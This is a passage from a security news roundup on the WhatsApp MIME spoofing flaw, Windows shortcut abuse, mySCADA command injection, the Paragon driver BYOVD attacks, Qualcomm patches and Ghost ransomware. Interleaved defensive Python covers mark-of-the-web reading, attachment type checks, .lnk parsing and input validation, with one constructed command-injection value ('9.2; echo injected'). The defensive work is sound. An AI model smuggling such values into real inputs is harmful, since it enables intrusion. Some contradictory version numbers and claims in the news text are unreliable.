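    """Read the Zone.Identifier alternate data stream of a file (NTFS only).

    The stream is addressed as "<file>:Zone.Identifier"; on a non-NTFS volume,
    a missing file or a file without the mark the open fails with OSError.
    """
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8",
                  errors="replace") as stream:
            return parse_zone_identifier(stream.read())
    except OSError:
        return None


def effective_motw(path: str) -> Optional[MarkOfTheWeb]:
    """Mark that should govern launching `path`.

    A symlink may carry no mark while the executable it points to does, so
    resolve the link and consult the target first; checking only the link is
    the gap the WinRAR 7.11 change log describes.
    """
    target = os.path.realpath(path)
    return read_motw(target) or read_motw(path)


if __name__ == "__main__":
    mark = parse_zone_identifier(SAMPLE_STREAM)
    print(mark.zone_name, "prompt on launch:", mark.warns_on_launch())
    print(repr(strip_origin_fields(SAMPLE_STREAM)))
```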

WhatsApp for Windows Exposed to Security Risk Through Spoofing Vulnerability

WhatsApp for Windows has recently been revealed to have a critical security vulnerability, tracked as CVE-2025-30401, which has raised serious concerns within the cybersecurity community since it was identified. The high-severity vulnerability affects desktop versions of the application released before 2.2450.6. It results from inconsistencies in the handling of file metadata, which threat actors can manipulate to circumvent security checks.

By exploiting this vulnerability, malicious actors can execute arbitrary code on targeted systems without the user's awareness, potentially gaining unauthorized access to sensitive information or compromising data. Security experts have emphasized that mitigating the risk requires updating WhatsApp to the latest version; organizations and users of WhatsApp for Windows are strongly advised to apply the patch immediately.

In accordance with the official security advisory, there is a critical inconsistency in how WhatsApp's desktop application deals with file attachments. There is a fundamental difference between the way the application determines how to display attachments using its MIME type versus the way the operating system interprets the file extension to determine how it should be opened or executed as a result. This difference in interpretation has created a serious security vulnerability. An attacker can create a malicious file that appears benign but is actually dangerous.

For instance, an attacker might pair a MIME type typically used for images with an executable file extension such as .exe. The application would visually present the file as safe, based on its MIME type, while the operating system would handle it according to its actual extension. Such a mismatch can mislead users into opening a file that appears harmless but is in fact executable, unintentionally triggering arbitrary code execution. This attack vector significantly increases the likelihood of successful social engineering attacks and system compromises.

There has been a significant amount of research conducted on the issue, and the findings indicate that if a deliberate discrepancy was made between the MIME type and the extension of the file, it could have led the recipient unintentionally to execute arbitrary code by manually accessing the attachment within WhatsApp's desktop application, instead of just viewing its contents. This behavior represented a considerable threat, particularly in scenarios involving the user initiating the interaction. 

Fortunately, the independent security researcher who discovered this vulnerability has been credited with responsibly disclosing it to Meta through the company's Bug Bounty Program, but the company does not appear to have confirmed whether the vulnerability has been actively exploited in the wild. It is important to note that such a security issue has not occurred on the platform in the past.

In July 2024, WhatsApp resolved a related security issue that allowed Python and PHP attachments to be run automatically on Windows systems with the corresponding interpreters installed, without prompting the user. That incident likewise highlighted the risks of handling and executing files incorrectly. Together, these cases emphasize the importance of rigorous input validation and consistent file interpretation across applications and operating systems, regardless of the type of application.
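The MIME-versus-extension mismatch described above, and the interpreter-handled .py/.php attachments from the 2024 issue, can both be caught by refusing to render a file until its declared type, its extension and its leading bytes agree. The following Python is an added illustration, not WhatsApp's or Meta's code; the type tables and sample headers are constructed.

```python
"""Consistency check between an attachment's declared MIME type, its file
extension and its leading bytes.

Added example, not WhatsApp's or Meta's code. The tables and sample inputs
are constructed and deliberately small.
"""
import os
from dataclasses import dataclass, field
from typing import List, Optional

# Extensions that Windows hands to a loader or scripting host rather than a
# viewer; .py and .php are included because of the July 2024 auto-run issue.
EXECUTABLE_EXTENSIONS = {
    ".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".ps1", ".vbs", ".js",
    ".jse", ".wsf", ".msi", ".hta", ".lnk", ".py", ".pyw", ".php",
}

# Extension -> MIME type the extension implies (constructed, not exhaustive).
EXTENSION_MIME = {
    ".png": "image/png", ".jpg": "image/jpeg", ".jpeg": "image/jpeg",
    ".gif": "image/gif", ".pdf": "application/pdf", ".txt": "text/plain",
    ".exe": "application/x-msdownload", ".py": "text/x-python",
}

# Leading bytes -> MIME type for content sniffing (constructed, not exhaustive).
MAGIC = [
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"%PDF", "application/pdf"),
    (b"MZ", "application/x-msdownload"),  # DOS/PE executable header
]


@dataclass
class Verdict:
    filename: str
    declared_mime: str
    extension_mime: Optional[str]
    sniffed_mime: Optional[str]
    reasons: List[str] = field(default_factory=list)

    @property
    def safe_to_render_as_declared(self) -> bool:
        return not self.reasons


def sniff_mime(head: bytes) -> Optional[str]:
    """Identify the content from its first bytes; None when unrecognised."""
    for magic, mime in MAGIC:
        if head.startswith(magic):
            return mime
    return None


def assess_attachment(filename: str, declared_mime: str, head: bytes) -> Verdict:
    """Refuse to treat a file as its declared type when the three views disagree.

    The bug described above arose because the display decision used only the
    MIME type while the operating system used only the extension; requiring
    every available signal to agree closes that gap.
    """
    ext = os.path.splitext(filename)[1].lower()
    declared = declared_mime.strip().lower()
    verdict = Verdict(filename, declared, EXTENSION_MIME.get(ext), sniff_mime(head))
    if ext in EXECUTABLE_EXTENSIONS:
        verdict.reasons.append(f"extension {ext} is executed, not displayed")
    if verdict.extension_mime and verdict.extension_mime != declared:
        verdict.reasons.append("declared MIME type does not match the extension")
    if verdict.sniffed_mime and verdict.sniffed_mime != declared:
        verdict.reasons.append("file content does not match the declared MIME type")
    return verdict


if __name__ == "__main__":
    samples = [  # constructed: a real PNG header, then an executable posing as one
        ("photo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8),
        ("photo.exe", "image/png", b"MZ\x90\x00"),
    ]
    for name, mime, head in samples:
        verdict = assess_attachment(name, mime, head)
        print(name, "OK" if verdict.safe_to_render_as_declared else verdict.reasons)
```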

Due to its vast user base and widespread adoption, WhatsApp remains a highly valuable target for cyber threat actors, whether they are motivated by financial gain or geopolitical interests. The platform has become a recurring target of malicious campaigns because of its deep integration into users' personal and professional lives, coupled with the trust it commands. There have been several incidents in which attackers have exploited security vulnerabilities within WhatsApp to gain access to users' data, exfiltrate sensitive data, and install sophisticated malware as a result. 

A zero-day vulnerability that affects WhatsApp is particularly lucrative in underground markets, sometimes commanding a price of over one million dollars. Not only does the WhatsApp user base have a large footprint, but attackers can also gain a strategic advantage by covertly accessing private conversations, media files, and even device-level capabilities. In March 2025, hackers were actively exploiting a zero-click, zero-day vulnerability to deliver Graphite, a form of spyware developed by Paragon; WhatsApp remedied it that same month.

Using this exploit, targeted individuals could be monitored remotely without any interaction on their part, a hallmark of an advanced persistent threat campaign. The surveillance campaign, which targeted journalists and members of civil society, was uncovered by an investigation conducted by the Citizen Lab, a research group based at the University of Toronto.

Following their report, WhatsApp swiftly acted to neutralize the campaign. Meta confirmed that the vulnerability had been silently patched in December 2024 without a client-side update being required. Despite being resolved without a formal CVE identifier being assigned, the issue is still of great importance to the global community. In order to protect platforms of such importance from exploitation, proactive vulnerability management, continuous security auditing, and cross-sector cooperation must be adopted. 

In the wake of the server-side mitigations, WhatsApp sent security notifications on January 31 to roughly 90 Android users across more than two dozen countries who had been affected by the vulnerability. Journalists and human rights activists in Italy were among those alerted. They were identified as the targets of an elaborate surveillance operation using Paragon's Graphite spyware, delivered through the zero-click exploit.

In a broader pattern of highly targeted intrusions using advanced surveillance tools, the Israeli cybersecurity firm NSO Group has been accused of violating American anti-hacking statutes by distributing its Pegasus spyware through WhatsApp zero-day vulnerabilities in December of 2016. Evidence provided to the court indicated that at least 1,400 mobile devices had been compromised as a result of these covert attacks.

According to court documents, NSO Group carried out zero-click surveillance operations by deploying multiple zero-day exploits to compromise WhatsApp's systems. As part of the spyware delivery process, malicious messages were sent that did not require the recipient to interact with them at all, exploiting vulnerabilities within the messaging platform. Aside from that, the documents also allege that NSO developers reverse engineered WhatsApp's source code to create custom tools that could deliver these payloads, conduct that was deemed to have been illegal under state and federal cybersecurity laws. 

Those cases emphasize the increasing sophistication of commercial surveillance vendors and the need for robust legal and technical defenses to protect digital communication platforms, and the individuals who rely on them, from abuse. Users must remain vigilant, apply security updates promptly, and strengthen the security measures within widely used communication platforms to reduce the risk of cyber-attacks.

There has been an increasing prevalence of threat actors using sophisticated techniques to exploit even small inconsistencies, which is why it is essential to maintain a proactive and collaborative approach to cybersecurity. To maintain a secure digital environment, platform providers and end users both need to be aware of and responsible for their role as well.

Operation Zero Offers Up to $4M for Telegram Exploits


Operation Zero, a firm specializing in acquiring and selling zero-day vulnerabilities exclusively to Russian government entities and local companies, has announced a significant bounty for exploits targeting Telegram. The company is willing to pay up to $4 million for a full-chain exploit that could compromise the popular messaging app.

The exploit broker has set tiered rewards for different vulnerabilities:
  • Up to $500,000 for a one-click remote code execution (RCE) exploit.
  • Up to $1.5 million for a zero-click RCE exploit.
  • Up to $4 million for a full-chain exploit, potentially allowing hackers to gain full access to a target’s device.
Operation Zero’s focus on Telegram is strategic, given its widespread use in Russia and Ukraine. The company's offer provides insight into the Russian zero-day market, which remains largely secretive.

Exploit brokers often publicize bounties for vulnerabilities when they detect high demand. This suggests that the Russian government may have specifically requested Telegram exploits, prompting Operation Zero to advertise these high-value offers.

Zero-day vulnerabilities are particularly valuable because they remain unknown to software makers, making them highly effective for cyber operations. Among them, zero-click RCE exploits are the most sought after, as they require no user interaction—unlike phishing-based attacks—making them stealthier and more powerful.

A source familiar with the exploit market suggested that Operation Zero’s prices might be on the lower side, as the company could intend to resell these vulnerabilities multiple times at a higher margin.

“I don’t think they’ll actually pay full [price]. There will be some bar the exploit doesn’t clear, and they’ll only do a partial payment,” said the source.

Another industry expert noted that pricing depends on factors like exclusivity and whether Operation Zero intends to redevelop the exploits internally or act solely as a broker.

The Ukrainian government recently banned the use of Telegram for government and military personnel due to concerns over potential exploitation by Russian state-backed hackers. Security researchers have long warned that Telegram is less secure than alternatives like Signal and WhatsApp, primarily because it does not use end-to-end encryption by default.

“The vast majority of one-on-one Telegram conversations — and literally every single group chat — are probably visible on Telegram’s servers,” said cryptography expert Matthew Green.

Despite this, Telegram spokesperson Remi Vaughn stated: “Telegram has never been vulnerable to a zero-click exploit,” while also emphasizing the company’s bug bounty program.

The zero-day market has become increasingly competitive, driving up prices. In 2023, a WhatsApp zero-day was reportedly valued at $8 million. Operation Zero has previously offered $20 million for exploits capable of fully compromising iOS and Android devices but currently caps those payouts at $2.5 million.

With cyber threats escalating, the demand for zero-days—especially for widely used platforms like Telegram—remains at an all-time high.

Windows Shortcut Vulnerability Exploited by 11 State-Sponsored Outfits


Since 2017, at least 11 state-sponsored threat groups have actively exploited a Microsoft zero-day issue that allows for abuse of Windows shortcut files to steal data and commit cyber espionage against organisations across multiple industries. 

Threat analysts from Trend Micro's Trend Zero Day Initiative (ZDI) discovered roughly 1,000 malicious .lnk files that exploited the flaw, tracked as ZDI-CAN-25373, which allowed attackers to execute concealed malicious commands on a victim's PC via customised shortcut files.

“By exploiting this vulnerability, an attacker can prepare a malicious .lnk file for delivery to a victim,” researchers at Trend Micro noted. “Upon examining the file using the Windows-provided user interface, the victim will not be able to tell that the file contains any malicious content.”

The malicious files delivered by cybercriminals include a variety of payloads, including the Lumma infostealer and the Remcos remote access Trojan (RAT), which expose organisations to data theft and cyber espionage. 

State-sponsored outfits from North Korea, Iran, Russia, and China, as well as non-state actors, are among those behind the attacks exploiting the flaw, which have affected organisations in the government, financial, telecommunications, military, and energy sectors across North America, Europe, Asia, South America, and Australia.

North Korean actors were responsible for roughly 45% of the attacks, with Iran, Russia, and China each accounting for approximately 18%. Groups listed among the attackers include Evil Corp, Kimsuky, Bitter, and Mustang Panda.

According to Trend Micro, Microsoft has not fixed the flaw despite receiving a proof-of-concept exploit through Trend ZDI's bug bounty program. Trend Micro did not respond to a follow-up request for comment on its detection and submission timeline.

Microsoft's position remains that it will not be fixing the vulnerability described by Trend Micro at this time because it "does not meet the bar for immediate servicing under our severity classification guidelines," though the company "will consider addressing it in a future feature release," according to an email from a Microsoft spokesperson.

Meanwhile, Microsoft Defender can detect and block threat behaviour, as detailed by Trend Micro, and Microsoft's Windows Smart App Control prevents malicious files from being downloaded from the internet. Furthermore, Windows recognises shortcut (.lnk) files as potentially malicious file types, and the system will automatically display a warning if a user attempts to download one.
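As an added detection example (not Trend Micro's or Microsoft's code), the Python below parses the StringData section of the Shell Link (.lnk) format, extracts the command-line arguments and flags argument strings that the shortcut Properties dialog would not show faithfully. The visible-length limit is an assumption, and the fixture builder produces a header-plus-strings blob with no target, for exercising the parser only.

```python
"""Shell Link (.lnk) StringData triage.

Added detection example, not Trend Micro's or Microsoft's code. It parses the
header and StringData of the Shell Link binary format, extracts the
command-line arguments and flags argument strings the shortcut Properties
dialog would not display faithfully. VISIBLE_LIMIT is an assumption and
build_minimal_lnk() is a test fixture, not a usable shortcut.
"""
import re
import struct
from dataclasses import dataclass
from typing import List, Optional

HEADER_SIZE = 0x4C
# CLSID 00021401-0000-0000-C000-000000000046 as stored on disk (little-endian).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits from the ShellLinkHeader.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
# Assumed number of characters the Properties dialog's Target field shows.
VISIBLE_LIMIT = 260
# StringData fields in the order the format stores them.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


@dataclass
class ShellLinkStrings:
    name: Optional[str] = None
    relative_path: Optional[str] = None
    working_dir: Optional[str] = None
    arguments: Optional[str] = None
    icon_location: Optional[str] = None


def is_shell_link(data: bytes) -> bool:
    """HeaderSize must be 0x4C and the CLSID must be the Shell Link CLSID."""
    return (len(data) >= HEADER_SIZE
            and struct.unpack_from("<I", data, 0)[0] == HEADER_SIZE
            and data[4:20] == LNK_CLSID)


def parse_lnk_strings(data: bytes) -> ShellLinkStrings:
    """Skip header, optional IDList and LinkInfo, then read the StringData."""
    if not is_shell_link(data):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    result = ShellLinkStrings()
    for flag, attr in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        raw = data[pos:pos + count * width]
        if len(raw) != count * width:
            raise ValueError(f"truncated {attr} string")
        pos += count * width
        setattr(result, attr, raw.decode(codec, errors="replace"))
    return result


def suspicious_arguments(arguments: Optional[str]) -> List[str]:
    """Reasons the argument string deserves a look before the shortcut is trusted."""
    if not arguments:
        return []
    reasons = []
    controls = sorted({hex(ord(c)) for c in arguments if ord(c) < 0x20 or ord(c) == 0x7F})
    if controls:
        reasons.append(f"control characters in arguments: {controls}")
    if len(arguments) > VISIBLE_LIMIT:
        reasons.append(f"{len(arguments)} characters, beyond the {VISIBLE_LIMIT} assumed visible")
    longest = max((len(run) for run in re.findall(r"\s+", arguments)), default=0)
    if longest > 8:
        reasons.append(f"whitespace run of {longest} characters pushes text out of view")
    return reasons


def build_minimal_lnk(name: str, arguments: str) -> bytes:
    """Constructed fixture: header plus NAME and COMMAND_LINE_ARGUMENTS only.

    Without an IDList, LinkInfo or relative path there is no target for
    Explorer to resolve, so this exercises the parser but is not a shortcut.
    """
    flags = HAS_NAME | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sII", HEADER_SIZE, LNK_CLSID, flags, 0)
    header += b"\x00" * (HEADER_SIZE - len(header))

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + string_data(name) + string_data(arguments)
```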

Critical Security Flaws Discovered in mySCADA myPRO SCADA System

Cybersecurity researchers have identified two high-severity vulnerabilities in mySCADA myPRO, a Supervisory Control and Data Acquisition (SCADA) system widely used in operational technology (OT) environments. These flaws could allow threat actors to gain unauthorized control over affected systems.

"These vulnerabilities, if exploited, could grant unauthorized access to industrial control networks, potentially leading to severe operational disruptions and financial losses," said Swiss security firm PRODAFT.

Both security flaws are rated 9.3 on the CVSS v4 scale and stem from operating system command injection issues:
  • CVE-2025-20014 – Allows attackers to execute arbitrary commands via crafted POST requests with a version parameter.
  • CVE-2025-20061 – Enables remote command execution using a POST request with an email parameter.
If exploited, these vulnerabilities could enable command injection and arbitrary code execution on affected systems.
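To show the bug class behind the two CVEs, here is an added example with hypothetical request handlers, not mySCADA's code: one splices the `version` parameter into a shell command string, the other validates `version` and `email` against allow-lists and builds an argv list instead. The tool name `mypro-admin` is a placeholder, and commands are returned rather than executed.

```python
"""Unsafe and hardened handling of the two POST parameters named in the advisory.

Added example with hypothetical handlers; this is not mySCADA's code, and
`mypro-admin` is a placeholder for whatever back-end tool a server might call.
Commands are returned, not executed, so the example runs offline.
"""
import re
import shlex
from typing import Callable, List

# Allow-lists: a dotted numeric version and a conservative e-mail shape.
# Anything else, including every shell metacharacter, is rejected outright.
VERSION_RE = re.compile(r"^\d{1,4}(?:\.\d{1,4}){0,3}$")
EMAIL_RE = re.compile(
    r"^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$")


def unsafe_command(version: str) -> str:
    """Vulnerable pattern: the request parameter is spliced into one string that
    would be handed to a shell (shell=True or system()). Metacharacters in
    `version` then become part of the command line."""
    return f"mypro-admin --set-version {version}"


def shell_would_split(command: str) -> List[str]:
    """Tokenise `command` the way a POSIX shell would, so the effect of an
    injected separator is visible without running anything."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lexer)


def validate_version(version: str) -> str:
    if not VERSION_RE.fullmatch(version):
        raise ValueError("version must be dotted digits, e.g. 9.2.1")
    return version


def validate_email(email: str) -> str:
    if len(email) > 254 or not EMAIL_RE.fullmatch(email):
        raise ValueError("email address has an unexpected shape")
    return email


def safe_command(version: str) -> List[str]:
    """Hardened pattern: validate first, then build an argv list. An argv list
    reaches the program as separate arguments (subprocess.run without
    shell=True), so nothing in it is ever interpreted by a shell."""
    return ["mypro-admin", "--set-version", validate_version(version)]


def safe_mail_command(email: str) -> List[str]:
    """Same treatment for the email parameter named in the advisory."""
    return ["mypro-admin", "--notify", validate_email(email)]


def is_rejected(validator: Callable[[str], str], value: str) -> bool:
    """True when the allow-list refuses `value`."""
    try:
        validator(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    hostile = "9.2; echo injected"   # constructed: a separator smuggled into version
    print(shell_would_split(unsafe_command(hostile)))
    print("rejected by allow-list:", is_rejected(validate_version, hostile))
    print(safe_command("9.2.1"), safe_mail_command("ops@example.com"))
```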

Security Updates & Mitigation Measures

The issues have been addressed in the following patched versions:
  • mySCADA PRO Manager 1.3
  • mySCADA PRO Runtime 9.2.1
PRODAFT attributes the flaws to improper input validation, which creates an entry point for command injection attacks.

"These vulnerabilities highlight the persistent security risks in SCADA systems and the need for stronger defenses," the company stated. "Exploitation could lead to operational disruptions, financial losses, and safety hazards."

Organizations using mySCADA myPRO should take immediate action by:
  1. Applying the latest patches to eliminate vulnerabilities.
  2. Isolating SCADA systems from IT networks through network segmentation.
  3. Enforcing strong authentication measures to prevent unauthorized access.
  4. Monitoring system activity for signs of suspicious behavior.
By implementing these cybersecurity best practices, organizations can fortify their SCADA environments against potential attacks.

Cybercriminals Target Paragon Partition Manager Vulnerability in BYOVD Attacks

It has been reported that threat actors have been actively exploiting a security vulnerability in the BioNTdrv.sys driver of Paragon Partition Manager in ransomware attacks, elevating privileges and executing arbitrary code. The CERT Coordination Center (CERT/CC) has identified this zero-day vulnerability as CVE-2025-0289, one of five security flaws discovered by Microsoft during the past year.

The other flaws identified include arbitrary memory mapping, arbitrary memory write, null pointer dereference, insecure kernel resource access, and arbitrary memory move vulnerabilities. What makes exploitation especially concerning is that BioNTdrv.sys is a Microsoft-signed driver, which allows adversaries to use the Bring Your Own Vulnerable Driver (BYOVD) technique.

Using this method, attackers can compromise systems regardless of whether Paragon Partition Manager is installed, broadening the attack surface significantly. As BioNTdrv.sys operates at the kernel level, threat actors can exploit these vulnerabilities to execute commands with elevated privileges. This allows them to bypass security measures and defensive software, as attackers can access the system and deploy additional malicious payloads. 

Although Microsoft researchers identified all five security flaws, the company has not said which ransomware groups have been leveraging CVE-2025-0289 in their attacks, only that it has been weaponized in ransomware operations. A bulletin issued by the CERT Coordination Center (CERT/CC) indicated that threat actors have been exploiting this vulnerability to conduct BYOVD-based ransomware attacks.

CVE-2025-0289 can be exploited to escalate privileges to the SYSTEM level and execute further malicious code within compromised environments. Because it lends itself to BYOVD attacks, it can be abused even on systems where the affected driver was never installed, allowing threat actors to gain elevated privileges and execute malicious code past the security controls in place.

Among the identified security flaws affecting BioNTdrv.sys versions 1.3.0 and 1.5.1, CVE-2025-0285 is a flaw in version 7.9.1 that permits the mapping of kernel memory from arbitrary user input because the input length is not properly validated. By exploiting this vulnerability, a user can escalate privileges further.

CVE-2025-0286 exists in version 7.9.1 and results from improper validation of user-controlled input, allowing attackers to execute malicious code on the target machine. An unprivileged code execution vulnerability has also been found in version 7.9.1, caused by an insufficiently validated MasterLrp structure in the input buffer, which can result in a null pointer dereference.

Successful exploit allows arbitrary kernel-level code to be executed, facilitating privilege escalation and further misuse. Version 7.9.1 contains a vulnerability in the memmove function. This function fails to properly sanitize user-supplied data, allowing attackers to manipulate kernel memory and escalate privileges. 

CVE-2025-0289, an insecure kernel resource access vulnerability, has been found in version 17 and stems from a failure to validate the MappedSystemVa pointer before passing it to HalReturnToFirmware. By exploiting this vulnerability, attackers can compromise the system.

This security vulnerability has been addressed by Paragon Software by releasing the updated driver BioNTdrv.sys version 2.0.0 across all products within Paragon Software's Hard Disk Manager suite, including Partition Manager versions 17.45.0 and later versions. This update has been developed to reduce the risks associated with the previously identified security vulnerabilities. 

There is also a dedicated security patch available for 64-bit versions of Windows 10, Windows 11, and Windows Server 2016, 2019, 2022, and 2025 that will provide users with an additional layer of protection against any exploits that might occur in the future, thereby enhancing the level of security. As part of Microsoft's efforts to protect its ecosystem, it has updated its Vulnerable Driver Blocklist, which effectively disables the execution of BioNTdrv.sys versions that are compromised within Windows environments, thereby preventing exploitation. 

Users and enterprises are strongly encouraged to ensure that this protection mechanism is kept in place to prevent exploitation. In light of the ongoing threat posed by these vulnerabilities, especially as a result of ransomware attacks, all users of Paragon Partition Manager and its associated products must update their software as soon as possible to the newest version available. 

As a further precaution, all Windows users should ensure that the Microsoft Vulnerable Driver Blocklist feature is enabled as soon as possible, as it serves as a critical defense against BYOVD (Bring Your Own Vulnerable Driver) attacks, in which outdated or insecure drivers are leveraged to elevate privileges and compromise a system.

Qualcomm Identifies and Patches Critical Security Issues in Latest Update

Several vulnerabilities were identified in Qualcomm's March 2025 security update, affecting many products, including automotive systems, mobile chipsets, and networking devices. The bulletin covers several critical security issues, including memory corruption and input validation flaws that could be exploited to compromise affected systems.

The Qualcomm Security Updates are intended to improve the security of Qualcomm's technology ecosystem as well as strengthen its protection against possible cyber threats. There had been multiple security vulnerabilities identified and resolved by Qualcomm and MediaTek over the last few weeks, some of which had already been addressed by their respective Android updates, which were deployed in the previous weeks. 

Qualcomm released the March 2025 Security Bulletin, which outlined 14 vulnerabilities, all of which were addressed via upstream updates to its proprietary software. Most of these flaws are classified as critical or high severity, highlighting the seriousness of the threat they pose to users. Several of the vulnerabilities involve memory corruption affecting Qualcomm's automotive software platform based on the QNX operating system.

Qualcomm has also released patches to resolve five high-severity vulnerabilities, which could result in information disclosure, denial-of-service (DoS) attacks, and memory corruption. Furthermore, two moderate-severity flaws have been addressed as part of the latest security updates launched by the semiconductor manufacturer.

The semiconductor manufacturer has also resolved seven high-severity and six medium-severity defects in open-source components it ships. Qualcomm emphasized that OEMs (original equipment manufacturers) are being actively notified of the updates and urged to implement the fixes on deployed devices as soon as possible.

It is noteworthy that Google's March 2025 Android security update addressed three of the identified vulnerabilities: CVE-2024-43051, CVE-2025-53011, and CVE-2024-53025. MediaTek, for its part, has disclosed ten security vulnerabilities affecting multiple chipsets. Among the company's fixes are three high-severity issues, including a memory corruption flaw in modems that can lead to DoS attacks, as well as out-of-bounds write vulnerabilities in KeyInstall and WLAN that can lead to escalation of privileges.

This security bulletin from Qualcomm not only addresses vulnerabilities identified in proprietary software, but also vulnerabilities in open-source components that Qualcomm's products are integrated with. There are several security flaws affecting Android operating systems, camera drivers, and multimedia frameworks, among others. Qualcomm intends to mitigate the potential risks of these vulnerabilities by informing its customers and partners and strongly urging that patches be deployed as soon as possible to mitigate these risks. 

Users of Qualcomm-powered devices should check with their device manufacturers to learn about the availability of security updates and patches for those devices. During the last few months, Qualcomm has released a series of security updates demonstrating its commitment to increasing cybersecurity across all its product lines. By addressing critical vulnerabilities and working closely with original equipment manufacturers (OEMs) to facilitate timely patch deployments, the company aims to decrease security risks and enhance the integrity of its systems. 

As the threat of cyber-attacks continues to evolve, maintaining robust security measures through regular updates is imperative. According to Qualcomm, their users are encouraged to stay informed about security developments and to ensure they get the latest patches installed on their devices to prevent any possible exploitation of the vulnerabilities. In addition, organizations that are utilizing Snapdragon-powered systems are also encouraged to make sure that these updates are implemented promptly as a means of ensuring that their technology infrastructure is secure and reliable.

FBI and CISA Issue Warning of Ongoing ‘Ghost’ Ransomware Attacks


Ghost, a ransomware outfit, has been exploiting software and firmware flaws since January, according to an FBI and Cybersecurity and Infrastructure Security Agency (CISA) advisory issued last week.

The outfit, also known as Cring and based in China, focusses on internet-facing services with unpatched vulnerabilities that users might have fixed years ago, according to the agencies. Cybersecurity researchers initially raised concerns about the group in 2021. 

"This indiscriminate targeting of networks containing vulnerabilities has resulted in the compromise of organisations in more than 70 countries, including China," according to the notice issued by the Multi-State Information Sharing and Analysis Centre (MS-ISAC).

The notice lists the following vulnerabilities: Microsoft Exchange servers that are still vulnerable to the ProxyShell attack chain; servers running Adobe's ColdFusion for web applications; and issues in unpatched Fortinet security appliances. 
Critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses are among the listed victims since 2021, according to the notice. The goal is financial gain, with ransom demands occasionally amounting to hundreds of thousands of dollars.

“Persistence is not a major focus for Ghost actors, as they typically only spend a few days on victim networks,” the agencies further added. “In multiple instances, they have been observed proceeding from initial compromise to the deployment of ransomware within the same day.” 

The notice claims that the ransomware outfit employs common hacking tools like Cobalt Strike and Mimikatz, and that the malware they deploy frequently has file names like Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe. 

“The impact of Ghost ransomware activity varies widely on a victim-to-victim basis,” the agencies concluded. “Ghost actors tend to move to other targets when confronted with hardened systems, such as those where proper network segmentation prevents lateral movement to other devices.”

Prevention tips 

To defend against Ghost ransomware attacks, network defenders should take the following steps:

  • Create regular, off-site system backups that cannot be encrypted by ransomware. 
  • Patch the operating system, software, and firmware vulnerabilities as quickly as feasible.
  • Focus on the security holes targeted by Ghost ransomware (i.e., CVE-2018-13379, CVE-2010-2861, CVE-2009-3960, CVE-2021-34473, CVE-2021-34523, CVE-2021-31207). 
  • Segment networks to restrict lateral movement from compromised devices. 
  • Implement phishing-resistant multi-factor authentication (MFA) for all privileged accounts and email service accounts.